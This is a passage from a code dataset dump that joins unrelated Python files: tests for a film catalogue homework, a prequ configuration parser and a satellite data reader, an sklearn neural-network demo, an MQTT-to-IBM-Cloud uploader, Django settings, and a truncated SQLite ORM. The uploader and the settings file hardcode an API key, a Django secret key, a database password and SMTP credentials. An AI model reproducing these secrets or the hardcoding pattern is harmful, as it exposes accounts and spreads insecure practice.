correttamente dal caricamento del file'''\n self.assertTrue(nome in self.registi, f\"Il regista {nome} deve apparire nel catalogo_registi\")\n regista = self.registi[nome]\n self.assertEqual(type(regista), Regista, \"Nel catalogo_registi ci deve essere una istanza di Regista\")\n\n # Regista.nome()\n self.assertEqual(regista.nome(), nome, f\"Il nome del Regista è {nome}\")\n\n # Regista.anni_di_lavoro()\n self.assertEqual(regista.anni_di_lavoro(), anni, f\"Il regista {nome} ha lavorato {anni} anni\")\n\n @data(\n ['Michelangelo Antonioni',\n [\"L'eclisse\", 'La notte', 'Professione: reporter', 'Blowup', 'Il deserto rosso', 'Zabriskie Point',\n \"L'avventura\"]\n ],\n ['Woody Allen',\n ['Radio Days', 'Take the Money and Run', 'Bullets Over Broadway', 'Husbands and Wives', 'Stardust Memories',\n 'Match Point', 'Zelig', 'Manhattan', 'Manhattan Murder Mystery', 'The Purple Rose of Cairo', 'Whatever Works',\n 'Annie Hall', 'Love and Death', 'Sweet and Lowdown', 'Interiors', 'Another Woman', 'Crimes and Misdemeanors',\n 'Midnight in Paris', 'Deconstructing Harry', 'Broadway Danny Rose', 'Mighty Aphrodite',\n 'Vicky Cristina Barcelona', 'Bananas', 'Sleeper', 'Hannah and Her Sisters']\n ],\n )\n @unpack\n def test_31_Regista_films(self, nome, titoli):\n # Regista.films()\n regista = self.registi[nome]\n films = regista.films()\n # print(\"FILMS\", [f.titolo() for f in films])\n self.do_test_gruppo_film(films, set, titoli, f\"films del regista {nome}\")\n\n @data(\n # regista attore preferito\n ['Michelangelo Antonioni', 'Monica Vitti'],\n ['Woody Allen', 'Woody Allen'],\n )\n @unpack\n def test_31_Regista_attore_preferito(self, nome, AP):\n # Regista.attore_preferito()\n regista = self.registi[nome]\n a = regista.attore_preferito()\n self.do_check_attore(a, AP, f'attore preferito di {nome}')\n\n # TODO: what else?\n\n################################################################################\n\nif __name__ == '__main__':\n Test.main()\n\n","sub_path":"Homework Python 2018-19/homework03/test_03.py","file_name":"test_03.py","file_ext":"py","file_size_in_byte":23266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"454468205","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nimport io\n\nimport pytest\n\nfrom prequ.configuration import (\n InvalidPrequConfiguration, NoPrequConfigurationFound, PrequConfiguration,\n UnknownWheelSource, get_data_errors, text)\n\nfrom .utils import create_configuration, in_temporary_directory\n\nfield_types = [\n ('text_item', text),\n ('int_item', int),\n ('list_item_int_value', [int]),\n ('dict_item', {text: text}),\n ('dict_item_int_value', {text: int}),\n ('dict_item_int_key', {int: text}),\n ('sub.int_item', int),\n ('sub.text_item', text),\n ('a.b.c', int),\n]\n\nok_data = {\n 'text_item': 'hello',\n 'int_item': 42,\n 'list_item_int_value': [1, 2, 3],\n 'dict_item': {'foo': 'bar', 'something': 'else'},\n 'dict_item_int_value': {'a': 1, 'b': 2},\n 'dict_item_int_key': {4: 'four', 2: 'two'},\n 'sub': {'text_item': 'hello'},\n 'a': {'b': {'c': 100}},\n}\n\n\ndef test_get_data_errors_edge_cases():\n assert get_data_errors({}, []) == []\n assert get_data_errors({}, field_types) == []\n\n\ndef test_get_data_errors_unknown_keys():\n assert get_data_errors({'a': 'b'}, []) == ['Unknown key name: \"a\"']\n assert get_data_errors({'x': 1}, field_types) == ['Unknown key name: \"x\"']\n\n\ndef test_get_data_errors_simple():\n assert get_data_errors({'a': 'foobar'}, [('a', int)]) == [\n 'Field 
\"a\" should be int']\n assert get_data_errors({'a': 'foobar'}, [('a', {text: text})]) == [\n 'Field \"a\" should be dict']\n assert get_data_errors({'a': {'foobar': 2}}, [('a', {text: text})]) == [\n 'Values of \"a\" should be ' + text.__name__]\n assert get_data_errors({'a': {2: 'foobar'}}, [('a', {text: text})]) == [\n 'Keys of \"a\" should be ' + text.__name__]\n\n\ndef test_get_data_errors_sub_dict():\n assert get_data_errors({'a': 1}, field_types) == [\n 'Field \"a\" should be dict']\n assert get_data_errors({'a': {'b': 1}}, field_types) == [\n 'Field \"a.b\" should be dict']\n\n\ndef test_get_data_errors_with_unknown_subkey():\n assert get_data_errors({'sub': {'unknown': 42}}, field_types) == [\n 'Unknown key name: \"sub.unknown\"']\n\n\ndef test_get_data_errors_with_known_subkey():\n assert get_data_errors({'sub': {'int_item': 42}}, field_types) == []\n assert get_data_errors({'sub': {'text_item': ''}}, field_types) == []\n\n\ndef test_get_data_errors_with_ok_data():\n assert get_data_errors(ok_data, field_types) == []\n\n\ndef test_get_data_errors_with_int_error():\n not_ok = dict(ok_data, int_item='hello')\n assert get_data_errors(not_ok, field_types) == [\n 'Field \"int_item\" should be int']\n\n\ndef test_get_data_errors_with_list_error():\n not_ok = dict(ok_data, list_item_int_value=42)\n assert get_data_errors(not_ok, field_types) == [\n 'Field \"list_item_int_value\" should be list']\n\n\ndef test_get_data_errors_with_list_item_error():\n not_ok = dict(ok_data, list_item_int_value=['not int'])\n assert get_data_errors(not_ok, field_types) == [\n 'Values of \"list_item_int_value\" should be int']\n\n\ndef test_get_data_errors_with_dict_error():\n not_ok = dict(ok_data, dict_item='hello')\n assert get_data_errors(not_ok, field_types) == [\n 'Field \"dict_item\" should be dict']\n\n\ndef test_get_data_errors_with_sub_text_error():\n not_ok = dict(ok_data, sub={'text_item': 42})\n assert get_data_errors(not_ok, field_types) == [\n 'Field \"sub.text_item\" should be ' + text.__name__]\n\n\ndef test_get_data_errors_invalid_type_specifier():\n with pytest.raises(ValueError):\n get_data_errors({'x': 1}, [('x', set('abc'))])\n\n\ndef test_from_dict_with_errors():\n conf_data = {'unknown_key': 'value'}\n with pytest.raises(InvalidPrequConfiguration) as excinfo:\n PrequConfiguration.from_dict(conf_data)\n assert '{}'.format(excinfo.value) == (\n 'Errors in Prequ configuration: Unknown key name: \"unknown_key\"')\n\n\ndef test_unknown_wheel_source():\n conf_data = {\n 'requirements': {'base': 'foobar==1.2 (wheel from baz)'}\n }\n conf = PrequConfiguration.from_dict(conf_data)\n with pytest.raises(UnknownWheelSource) as excinfo:\n list(conf.get_wheels_to_build())\n assert '{}'.format(excinfo.value) == (\n 'No URL template defined for \"baz\"')\n\n\n@pytest.mark.parametrize('enabled', [\n '', 'annotate', 'generate_hashes', 'header',\n 'index_url', 'extra_index_urls',\n 'trusted_hosts', 'find_links'])\ndef test_get_prequ_compile_options(enabled):\n conf_data = {'requirements': {'base': ''}, 'options': {}}\n expected_opts = {\n 'annotate': False,\n 'generate_hashes': False,\n 'header': True,\n }\n if enabled == 'index_url':\n conf_data['options'][enabled] = 'http://example.com'\n expected_opts[enabled] = 'http://example.com'\n elif enabled == 'extra_index_urls':\n conf_data['options'][enabled] = ['http://example.com']\n expected_opts['extra_index_url'] = ['http://example.com']\n elif enabled == 'trusted_hosts':\n conf_data['options'][enabled] = ['machine']\n expected_opts['trusted_host'] = 
['machine']\n elif enabled == 'find_links':\n conf_data['options']['wheel_dir'] = 'some_dir'\n expected_opts[enabled] = ['some_dir']\n elif enabled:\n conf_data['options'][enabled] = True\n expected_opts[enabled] = True\n conf = PrequConfiguration.from_dict(conf_data)\n opts = conf.get_prequ_compile_options()\n assert opts == expected_opts\n\n\ndef test_label_sorting():\n data = {'requirements': {'a': '', 'base': '', 'b': '', 'c': ''}}\n conf = PrequConfiguration.from_dict(data)\n assert conf.labels == ['base', 'a', 'b', 'c']\n\n\ndef test_requirements_in_generation():\n data = {\n 'requirements': {\n 'base': 'framework',\n 'dev': 'ipython',\n 'test': 'pytest',\n }\n }\n conf = PrequConfiguration.from_dict(data)\n assert conf.get_requirements_in_for('base') == 'framework'\n assert conf.get_requirements_in_for('dev') == (\n '-c requirements.txt\\n'\n 'ipython')\n assert conf.get_requirements_in_for('test') == (\n '-c requirements.txt\\n'\n 'pytest')\n\n\ndef test_from_dir():\n with in_temporary_directory():\n create_configuration(\n requirements={\n 'base': ['foobar'],\n 'requirements-local.in': ['ipython'],\n })\n conf = PrequConfiguration.from_directory('.')\n assert conf.requirement_sets['base'] == '\\nfoobar'\n assert conf.requirement_sets['local'] == 'ipython'\n\n\ndef test_from_dir_without_conf():\n with in_temporary_directory():\n with pytest.raises(NoPrequConfigurationFound):\n PrequConfiguration.from_directory('.')\n\n\ndef test_from_in_files():\n conf = {\n 'no_setup_cfg': True,\n 'requirements': {'requirements.in': ['foobar']},\n }\n with in_temporary_directory():\n create_configuration(**conf)\n conf = PrequConfiguration.from_in_files('requirements.in')\n assert conf.requirement_sets['base'] == 'foobar'\n\n\ndef test_from_in_files_invalid_filename():\n conf = {\n 'no_setup_cfg': True,\n 'requirements': {'requirements_foo.in': ['foobar']},\n }\n with in_temporary_directory():\n create_configuration(**conf)\n with pytest.raises(InvalidPrequConfiguration) as excinfo:\n PrequConfiguration.from_in_files('requirements_foo.in')\n assert '{}'.format(excinfo.value) == (\n 'Invalid in-file name: requirements_foo.in')\n\n\nconf_ini_content = \"\"\"\n[prequ]\nannotate = True\nextra_index_urls =\n https://one.example.com/\n https://two.example.com/\nwheel_dir = wh€€ls\nwheel_sources =\n test_gh = git+ssh://git@github.com/test/{pkg}@{ver}\n\nrequirements =\n foobar\n somewheel==1.0.0 (wheel from test_gh)\n barfoo\n\nrequirements-dev =\n devpkg>=2\n\"\"\"\n\n\ndef test_configuration_parsing_ini():\n stream = io.StringIO(conf_ini_content)\n conf = PrequConfiguration.from_ini(stream)\n assert conf.annotate is True\n assert conf.extra_index_urls == [\n 'https://one.example.com/', 'https://two.example.com/']\n assert conf.wheel_dir == 'wh€€ls'\n assert conf.wheel_sources == {\n 'test_gh': 'git+ssh://git@github.com/test/{pkg}@{ver}'}\n assert sorted(conf.requirement_sets.keys()) == ['base', 'dev']\n assert conf.requirement_sets['base'] == (\n '\\n'\n 'foobar\\n'\n 'somewheel==1.0.0\\n'\n 'barfoo')\n assert conf.requirement_sets['dev'] == '\\ndevpkg>=2'\n assert conf.wheels_to_build == [('test_gh', 'somewheel', '1.0.0')]\n assert list(conf.get_wheels_to_build()) == [\n ('somewheel', '1.0.0',\n 'git+ssh://git@github.com/test/somewheel@1.0.0')]\n pass\n\n\ndef test_configuration_parsing_ini_no_section():\n other_ini_content = (\n '[other_section]\\n'\n 'something = else\\n')\n stream = io.StringIO(other_ini_content)\n conf = PrequConfiguration.from_ini(stream)\n assert conf is None\n\n\ndef 
test_configuration_parsing_ini_simple():\n other_ini_content = (\n '[prequ]\\n'\n 'requirements = flask\\n')\n stream = io.StringIO(other_ini_content)\n conf = PrequConfiguration.from_ini(stream)\n assert isinstance(conf, PrequConfiguration)\n assert conf.requirement_sets['base'] == 'flask'\n\n\ndef test_configuration_parsing_ini_without_base():\n other_ini_content = (\n '[prequ]\\n'\n 'requirements-test = pytest\\n')\n stream = io.StringIO(other_ini_content)\n conf = PrequConfiguration.from_ini(stream)\n assert conf.requirement_sets['test'] == 'pytest'\n assert 'base' not in conf.requirement_sets\n","sub_path":"tests/test_configuration.py","file_name":"test_configuration.py","file_ext":"py","file_size_in_byte":9624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"287436582","text":"# Copyright (c) 2017, Vienna University of Technology (TU Wien),\n# Department of Geodesy and Geoinformation (GEO).\n# All rights reserved.\n#\n# All information contained herein is, and remains the property of Vienna\n# University of Technology (TU Wien), Department of Geodesy and Geoinformation\n# (GEO). The intellectual and technical concepts contained herein are\n# proprietary to Vienna University of Technology (TU Wien), Department of\n# Geodesy and Geoinformation (GEO). Dissemination of this information or\n# reproduction of this material is forbidden unless prior written permission\n# is obtained from Vienna University of Technology (TU Wien), Department of\n# Geodesy and Geoinformation (GEO).\n\n'''\nTests for reading CGLOPS SWI data.\n'''\n\nfrom ascat.cgls import SWI_TS\nimport os\nimport pandas as pd\nimport numpy as np\n\n\ndef test_swi_ts_reader():\n\n data_path = os.path.join(\n os.path.dirname(__file__), 'test-data', 'sat', 'cglops', 'swi_ts')\n rd = SWI_TS(data_path)\n data = rd.read_ts(3002621, mask_frozen=False)\n data_sorted = data.sort_index()\n assert np.all(data_sorted.index == data.index)\n # just check if enough data is there\n reference_index = pd.date_range('20070101T12:00:00', '20161231T12:00:00')\n assert len(data) == len(reference_index)\n assert np.all(data_sorted.index == reference_index)\n\n lon, lat = rd.grid.gpi2lonlat(3002621)\n data = rd.read_ts(lon, lat, mask_frozen=False)\n data_sorted = data.sort_index()\n assert np.all(data_sorted.index == data.index)\n # just check if enough data is there\n reference_index = pd.date_range('20070101T12:00:00', '20161231T12:00:00')\n assert len(data) == len(reference_index)\n assert np.all(data_sorted.index == reference_index)\n\n\ndef test_swi_ts_qflag_reading():\n data_path = os.path.join(\n os.path.dirname(__file__), 'test-data', 'sat', 'cglops', 'swi_ts')\n rd = SWI_TS(data_path, parameters=['SWI_001', 'QFLAG_001', 'SSF'])\n data = rd.read_ts(3002621, mask_frozen=True)\n # check if QFLAG is correctly read. 
It should have as many NaN values as\n # SWI\n assert len(data[data.loc[:, 'QFLAG_001'] != np.nan]) > 0\n assert (len(data[data.loc[:, 'QFLAG_001'] == np.nan]) ==\n len(data[data.loc[:, 'SWI_001'] == np.nan]))\n\nif __name__ == \"__main__\":\n test_swi_ts_reader()\n","sub_path":"tests/test_cgls.py","file_name":"test_cgls.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"442538004","text":"#!python\n# -*- coding: utf-8 -*-#\n\"\"\"\nMulti-class Perceptron sklearn\n\n@author: Bhishan Poudel\n\n@date: Nov 14, 2017\nhttps://www.springboard.com/blog/beginners-guide-neural-network-in-python-scikit-learn-0-18/\n\n\"\"\"\n# Imports\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.metrics import classification_report,confusion_matrix\n\nimport pandas as pd\n\ndef mlp_sklearn():\n\n names = [\"Cultivator\", \"Alchol\", \"Malic_Acid\", \"Ash\", \"Alcalinity_of_Ash\", \"Magnesium\", \"Total_phenols\", \"Falvanoids\", \"Nonflavanoid_phenols\", \"Proanthocyanins\", \"Color_intensity\", \"Hue\", \"OD280\", \"Proline\"]\n\n wine = pd.read_csv('wine_data.txt', names=names)\n # print(\"wine.head() = {}\".format(wine.head()))\n\n a = wine.describe().transpose()\n # print(a)\n\n # print(\"wine.shape = {}\".format(wine.shape)) # (178, 14)\n\n X = wine.drop('Cultivator',axis=1)\n y = wine['Cultivator']\n X_train, X_test, y_train, y_test = train_test_split(X, y)\n scaler = StandardScaler()\n\n # Fit only to the training data\n scaler.fit(X_train)\n\n StandardScaler(copy=True, with_mean=True, with_std=True)\n\n # Now apply the transformations to the data:\n X_train = scaler.transform(X_train)\n X_test = scaler.transform(X_test)\n\n # test\n mlp = MLPClassifier(hidden_layer_sizes=(13,13,13), max_iter=500,random_state=100)\n mlp.fit(X_train,y_train)\n predictions = mlp.predict(X_test)\n\n\n # print(confusion_matrix(y_test,predictions))\n # print(classification_report(y_test,predictions))\n\n # coefs and weights\n print(\"len(mlp.coefs_) = {}\".format(len(mlp.coefs_)))\n print(\"len(mlp.coefs_[0]) = {}\".format(len(mlp.coefs_[0])))\n print(\"len(mlp.intercepts_[0]) = {}\".format(len(mlp.intercepts_[0])))\n\ndef main():\n \"\"\"Run main function.\"\"\"\n mlp_sklearn()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Machine_Learning_Univ_Course_(2017Fall)/Homeworks/hw06/prac/perceptron_eg/multilayer_perc_skn/mlp_sklearn.py","file_name":"mlp_sklearn.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"364620049","text":"#!/usr/bin/env python2\n\nimport paho.mqtt.client as mqtt\nimport numpy as np\n# import scipy.misc as misc\nimport json\nimport time\nimport sys\nimport traceback\n# import png\n# from PIL import Image\nfrom datetime import datetime\n\nimport ibm_boto3\nfrom ibm_botocore.client import Config, ClientError\n\nCLOUD_MQTT_HOST=\"cloudbroker\"\nCLOUD_MQTT_PORT=1883\nCLOUD_MQTT_TOPIC=\"/facedetect/cloud/faces\"\n\nCOS_BUCKET_NAME=\"byrnej-object-storage-wk3\"\nCOS_ENDPOINT= \"https://s3.private.us-east.cloud-object-storage.appdomain.cloud\"\n\n\n#### IBM CLOUD OBJECT STORAGE CREDENTIALS\ncred = {\n \"apikey\": \"rqhlDqUlhZaIUoxNoqbezz2384MRydk-h0he1wkUzIiM\",\n \"endpoints\": \"https://control.cloud-object-storage.cloud.ibm.com/v2/endpoints\",\n \"iam_apikey_description\": \"Auto-generated for 
key a0578150-577f-4895-9a2b-3a66d8038bfb\",\n \"iam_apikey_name\": \"byrnej-object-storage-wk7\",\n \"iam_role_crn\": \"crn:v1:bluemix:public:iam::::serviceRole:Writer\",\n \"iam_serviceid_crn\": \"crn:v1:bluemix:public:iam-identity::a/eda6b7edc8514da3814170714bcfa440::serviceid:ServiceId-f76673fa-73ac-4342-b7bd-f4c088e8791b\",\n \"resource_instance_id\": \"crn:v1:bluemix:public:cloud-object-storage:global:a/eda6b7edc8514da3814170714bcfa440:d4248333-b19f-4e17-9662-66a57ce4df55::\"\n}\n\n\n##### Create resource for COS:\ncos = ibm_boto3.resource(\"s3\",\n ibm_api_key_id=cred[\"apikey\"],\n ibm_service_instance_id=cred[\"resource_instance_id\"],\n ibm_auth_endpoint=\"https://iam.bluemix.net/oidc/token\",\n config=Config(signature_version=\"oauth\"),\n endpoint_url=COS_ENDPOINT\n)\n\n##### Test commands for successful connection to COS\nprint(\"trying to list buckets\")\nfor bucket in cos.buckets.all():\n print(\"Bucket Name: {0}\".format(bucket.name))\nprint(\"trying to list contents\")\nfiles = cos.Bucket(COS_BUCKET_NAME).objects.all()\nfor file in files:\n print(f\"Item: {file.key} ({file.size} bytes).\")\n\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected to cloud mqtt broker with result code \"+str(rc))\n print(\"Subscribing...\")\n client.subscribe(CLOUD_MQTT_TOPIC)\n print(\"Completed subscription to \" + CLOUD_MQTT_TOPIC)\n\n\n# allows us to get information about errors inside callbacks\ndef on_log(client, userdata, level, buf):\n # print(\"on_log:\",level,buf)\n if (level == MQTT_LOG_WARNING):\n print(\"MQTT_WARNING:\",buf)\n elif (level == MQTT_LOG_ERR):\n print(\"MQTT_ERROR:\",buf)\n print(\"Exiting.\")\n exit(-1)\n\n# Error in callbacks are not printed, nor exceptions thrown\n# outside the mqtt. Uses on_log to print out the results\ndef on_message(client, userdata, msg):\n try:\n print(\"Received a message, payload: \" + str(msg.payload)[:30] + \"...\")\n\n # create save filename based on time of message\n now = datetime.now()\n file_name = now.strftime(\"%y%m%d-%H%M%S.%f\") + \".json\"\n\n # convert back to array from json formatted string\n m_decode=str(msg.payload.decode(\"utf-8\",\"ignore\"))\n data = json.loads(m_decode)\n print(data[0])\n\n print(f\"Adding json text as '{file_name}' to COS\")\n cos.Object(COS_BUCKET_NAME, file_name).put(Body=m_decode)\n\n except:\n traceback.print_exc()\n quit(0)\n\nprint(\"Setting up Client object\")\nclient = mqtt.Client(client_id=\"imgproc\")\n\nprint(\"Adding Callbacks\")\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.on_log = on_log\n\n# set up connection to MQTT broker on the cloud VSI\nprint(\"Connecting to cloud broker\")\nclient.connect(CLOUD_MQTT_HOST, CLOUD_MQTT_PORT)\n\nprint(\"Starting loop...\")\n\nwhile True:\n client.loop(0.1)\n\n\n","sub_path":"wk7/ImageProcessor/py/imgproc.py","file_name":"imgproc.py","file_ext":"py","file_size_in_byte":3562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"639379326","text":"import os\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nSECRET_KEY = 'mcvc1cs@fhf3shj&$1sp=l=nj^t2r1=1%55pe9x0eghfukm!9m'\nDEBUG = True\nALLOWED_HOSTS = ['*']\nINSTALLED_APPS = [\n 'accounts',\n \n 'modeltranslation',\n\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.postgres',\n 'django.contrib.sites',\n 'django.contrib.sitemaps',\n\n 'channels',\n 
'chatrooms',\n\n 'allauth',\n 'allauth.account',\n 'allauth.socialaccount',\n\n 'crispy_forms',\n\n 'allauth.socialaccount.providers.facebook',\n\n 'blog',\n 'bootstrap4', \n 'mptt',\n 'import_export',\n 'taggit',\n 'django_summernote',\n 'ckeditor',\n 'ckeditor_uploader',\n # 'tinymce',\n 'categories',\n # 'froala_editor',\n 'robots',\n # 'meta',\n 'boards',\n 'rosetta',\n\n]\nSITE_ID =1\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\nROOT_URLCONF = 'core.urls'\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [os.path.join(BASE_DIR, 'templates')],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.template.context_processors.request',\n 'django.template.context_processors.i18n',\n 'django.contrib.messages.context_processors.messages',\n 'blog.views.category_list',\n 'accounts.views.avatar'\n ],\n },\n },\n]\n\nAUTHENTICATION_BACKENDS = [\n # Needed to login by username in Django admin, regardless of `allauth`\n 'django.contrib.auth.backends.ModelBackend',\n # `allauth` specific authentication methods, such as login by e-mail\n 'allauth.account.auth_backends.AuthenticationBackend',\n]\n\n\nWSGI_APPLICATION = 'core.wsgi.application'\nASGI_APPLICATION = 'core.asgi.application'\n\nCHANNEL_LAYERS = {\n 'default': {\n 'BACKEND': 'channels_redis.core.RedisChannelLayer',\n 'CONFIG': {\n 'hosts': [('127.0.0.1', 6379)]\n }\n }\n}\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql',\n 'NAME': 'db06',\n 'USER': 'postgres', \n 'PASSWORD': 'a',\n 'HOST': 'localhost',\n 'PORT': '5432', #my port is 3306\n }\n}\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\nfrom django.utils.translation import ugettext_lazy as _\n\nLANGUAGE_CODE = 'ar'\n# LANGUAGES = [\n# ('ar', _('Arabic')),\n# ('en', _('English')),\n# ]\ngettext = lambda s: s\nLANGUAGES = (\n ('ar', gettext('Arabic')),\n ('en', gettext('English')),\n)\n\nLOCALE_PATHS = [\n os.path.join(BASE_DIR,'locale'),\n]\n\nTIME_ZONE = 'UTC'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n# Error code\nCKEDITOR_UPLOAD_PATH = \"uploads/\"\nCKEDITOR_CONFIGS = {\n 'default': {\n 'toolbar': 'Custom',\n 'toolbar_Custom': [\n ['Bold', 'Italic', 'Underline'],\n ['NumberedList', 'BulletedList', '-', 'Outdent', 'Indent', '-', 'JustifyLeft', 'JustifyCenter', 'JustifyRight', 'JustifyBlock'],\n ['Link', 'Unlink'],\n ['RemoveFormat', 'Source']\n ],\n 'height': 300,\n 'width': 600,\n },\n}\n\nSTATIC_URL = '/static/'\nSTATIC_ROOT = os.path.join(BASE_DIR, \"staticfiles\")\t \nSTATICFILES_DIRS = [\n os.path.join(BASE_DIR, \"static\"),\t\t\t#<========\n]\n\nMEDIA_URL = '/media/'\nMEDIA_ROOT = os.path.join(BASE_DIR, 
'media')\nLOGIN_REDIRECT_URL = 'accounts:edit'\nLOGIN_URL = 'login'\nLOGOUT_URL = 'logout'\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\n\n \nX_FRAME_OPTIONS = 'SAMEORIGIN'\n\nSUMMERNOTE_THEME = 'bs4' # Show summernote with Bootstrap4 \n\n\nSUMMERNOTE_CONFIG = {\n\n # Or, you can set it to `False` to use SummernoteInplaceWidget by default - no iframe mode\n # In this case, you have to load Bootstrap/jQuery sources and dependencies manually.\n # Use this when you're already using Bootstrap/jQuery based themes.\n 'iframe': False,\n\n # You can put custom Summernote settings\n 'summernote': {\n # As an example, using Summernote Air-mode\n 'airMode': False,\n\n # Change editor size\n 'width': '100%',\n 'height': '480',\n\n # Use proper language setting automatically (default)\n 'lang': None,\n\n # Toolbar customization\n # https://summernote.org/deep-dive/#custom-toolbar-popover\n 'toolbar': [\n ['style', ['style']],\n ['font', ['bold', 'underline', 'clear']],\n ['fontname', ['fontname']],\n ['color', ['color']],\n ['para', ['ul', 'ol', 'paragraph']],\n ['table', ['table']],\n ['insert', ['link', 'picture' ]],\n ['view', ['fullscreen', 'codeview', 'help']],\n ],\n\n # Or, explicitly set language/locale for editor\n 'lang': 'ar-AR',\n \n}\n}\nACCOUNT_EMAIL_VERIFICATION = 'none'\n\n\nACCOUNT_EMAIL_REQUIRED = True\nACCOUNT_USERNAME_REQUIRED = True\nEMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\n# EMAIL_USE_TLS = True\n# EMAIL_HOST = 'smtp.gmail.com'\n# EMAIL_PORT = 587\n# EMAIL_HOST_USER = 'ahmedazadcxv@gmail.com'\n# EMAIL_HOST_PASSWORD = '+654+654'\n\n\nEMAIL_HOST = 'smtp.mailtrap.io'\nEMAIL_HOST_USER = '93e1f23e2fc176'\nEMAIL_HOST_PASSWORD = '456a4b33443a66'\nEMAIL_PORT = '2525'\n","sub_path":"core/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":6322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"24132473","text":"import cv2\nimport numpy as np\n\nfrom gbvision.models.contours import FilterContours, find_contours, sort_polygons, contour_center, contours_to_polygons\nfrom gbvision.constants.system import EMPTY_PIPELINE\nfrom .object_finder import ObjectFinder\n\n\nclass PolygonFinder(ObjectFinder):\n \"\"\"\n finds any generic polygon, not recommended when another finder can be used\n \"\"\"\n\n def __init__(self, threshold_func, game_object, area_scalar=1.0, contour_min_area=0):\n \"\"\"\n\n :param area_scalar: optional, a scalar to multiply the area by, for fine tuning of the function's output\n :param contour_min_area: the minimal area of a contour, used for FilterContours, default is 0 (no area limit)\n \"\"\"\n ObjectFinder.__init__(self, threshold_func, game_object)\n self._full_pipeline = (EMPTY_PIPELINE +\n threshold_func +\n find_contours +\n FilterContours(min_area=contour_min_area) +\n contours_to_polygons +\n sort_polygons)\n self.area_scalar = area_scalar\n\n def __call__(self, frame, camera):\n contours = self._full_pipeline(frame)\n return list(map(\n lambda cnt: self.game_object.location_by_params(camera, self.area_scalar * np.sqrt(cv2.contourArea(cnt)),\n contour_center(cnt)), contours))\n","sub_path":"gbvision/finders/polygon_finder.py","file_name":"polygon_finder.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"552455626","text":"import sqlite3\nfrom data.schema import DBPATH\n\nclass ORM:\n dbpath = DBPATH #<-- can be overwritten in inhereting class if 
desired. in this case is the same for all tables\n tablename = \"\" #<-- will be overwritten in inheriting classes\n fields = [] #<-- Column Headers in our tables | will be overwritten in inherting classes\n\n createsql = \"\"\" \"\"\" #<-- can be empty since account/position/trader will each have their own createsql (to create a table)\n\n def __init__(self, **kwargs):\n raise NotImplementedError\n\n def __repr__(self): #<-- what is printed when the print function is called on the class object (for debugging)\n template = \"<{} ORM: pk={}>\" \n return template.format(self.tablename, self.values['pk']) #<-- red underline since ORM cant be instantiated, inhereting classes wont throw error\n \n def __getitem__(self, key):\n return self.values[key] #<-- red underline since ORM cant be instantiated, inhereting classes wont throw error\n\n def __setitem__(self, key, value):\n self.values[key] = value #<-- red underline since ORM cant be instantiated, inhereting classes wont throw error\n\n def save(self): \n \"\"\"if self.values['pk] exists, update row else\n insert row (class Account/Trade/Position)\"\"\"\n if self.values['pk']: #<-- red underline since ORM cant be instantiated, inhereting classes wont throw error\n self.update_row()\n else:\n self.insert_row()\n\n def insert_row(self):\n \"\"\"insert the values from this istance into the db as a row,\n then return cursor.lastrowid, \n \\ncursor.lastrowid is id of last selected row (in this case inserted row)\"\"\"\n with sqlite3.connect(self.dbpath) as conn:\n curs = conn.cursor() #<-- curs allows to select in db\n fieldlist = \", \".join(self.fields) #<- .join returns a string of \"field, \" for each field in [fields]\n qmarks = \", \".join(['?' for _ in self.fields]) #<- .join returns a string of \"?, \" for each field in [fields] <- done to sanitize inputs\n SQL = \"\"\" INSERT INTO {} ({}) VALUES ({}); \"\"\".format( #<- SQL statement\n self.tablename, fieldlist, qmarks) #<- SQL statement continued\n values = [self.values[field] for field in self.fields]\n curs.execute(SQL, values) #<-- .execute() applies function to selected row (SQL statement is the SQL function), (values are our sanitized inputs in SQL statement)\n pk = curs.lastrowid #lastrowid --> read-only attribute provides the rowid of the last modified row. 
